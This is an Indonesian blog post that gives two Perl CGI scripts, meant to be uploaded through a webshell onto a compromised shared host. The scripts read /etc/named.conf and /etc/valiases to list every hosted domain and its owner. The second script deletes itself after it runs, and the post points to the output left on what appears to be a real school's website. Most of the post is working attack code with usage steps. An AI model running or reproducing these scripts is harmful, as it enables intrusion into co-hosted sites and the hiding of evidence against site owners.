Minggu, 18 September 2016

Cara bypass halaman ADMIN

selamat malam,,


saya cuma bisa shere ini karena saya juga newbie yg nggak bisa apa2,,

kali kali aja bermanfaat,,, dan mungkin udah banyak yg tau,, kalau blum tau

simak aja kakak heheheheh,,





#!/usr/bin/perl -I/usr/local/bandmin

print "Content-type: text/html\n\n";

print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>

<head>

<meta http-equiv="Content-Language" content="en-us" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>title</title>

<style type="text/css">

.newStyle1 {

background-color: #000000;

font-family: "Courier New", Courier, monospace;

font-size: large;

font-weight: bold;

color: #FFFFFF;

}

.style1 {

text-align: center;

}

</style> </head>

<body>

<p>Bypass</p>

';

open (d0mains, '/etc/named.conf') or $err=1;

@cnzs = <d0mains>;

close d0mains;

if ($err){

print ('<p>&nbsp;</p><p>C0uldn\'t Bypass it , Sorry</p>');

die();

}else{

print '<p>&nbsp;</p>

<p>Domains &amp; Users :</p>

';}

foreach my $one (@cnzs)

{

if($one =~ m/.*?zone "(.*?)" {/){

$filename= "/etc/valiases/".$1;

$owner = getpwuid((stat($filename))[4]);

print '<p><a href=\'http://'.$1.'\'>'.$1.'</a>'.' : '.$owner.'</p>

';

}

}

print'

</body> </html>';



copy ke notepad save dengan nama apa saja yg penting extensinya CGI misalkan baributz.CGI

upload ke server atau webshell lalu CHMOD 0755 baributz.cgi

lalu eksekusi mengunakan browser,,



saya lebih sering mengunakan script tersebut ketimbang yg php,,,

karena yg php peluang berhasil tipis atau kesalahan yg terjadi adalah "tidak dapat membaypass",,,



atau dengan cara lain,, menggunakan script di bawa ini,,

#!/usr/bin/perl -I/usr/local/bandmin



$tmp='';



#jump sysnkron by baributz



execute ('rm '.$0.''); #hapus script,tapi perintah2 dibawahnya tetep jalan koq





print '

baributz

';



open (d0mains, '/etc/named.conf') or $err=1;

@kr = <d0mains>;

@kr=uniq2(@kr);

close d0mains;



if ($err)

{

print ('proses gagal !!!');

die();

}

else

{

print ('

Dimulai dan startx !!!

===========================

');

}





$num=0;

$webe;

foreach my $one (@kr)

{

if($one =~ m/.*?zone "(.*?)" {/)

{

$webe=$1;

$num=$num+1;

$filename= "/etc/valiases/".$webe;

$owner = getpwuid((stat($filename))[4]);

print "".$webe." : /home/".$owner."/public_html/

";

}

}



print ('

===========================

total='.$num.'

Selesai and finish !!!');





sub uniq2

{

my %seen = ();

my @r = ();

foreach my $a (@_)

{

unless ($seen{$a})

{

push @r, $a;

$seen{$a} = 1;

}

}

return @r;

}





sub execute{

my $cmd = shift;

#print "$cmd\n";

my $ret = `$cmd`;

#print $ret;

$ret =~ s/\s+$//gi;

return $ret;

}



save script tersebut dengan nama apa saja misalnya baributz.pl

kemudian upload ke server atau webshell kalian lalu jalankan comand perl baributz.pl |sort>>admin.txt;ls -al;pwd lalu eksekusi di browserhasilnya kayak gini http://www.smkn2cilacap.sch.id/elearning/admin.txt

NB: PERL MODE ON



ok kalau ada yg kurang jelas tanyakan di bawa saja,, untuk yg lainnya saya akan shere kalau ada waktu,,

Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)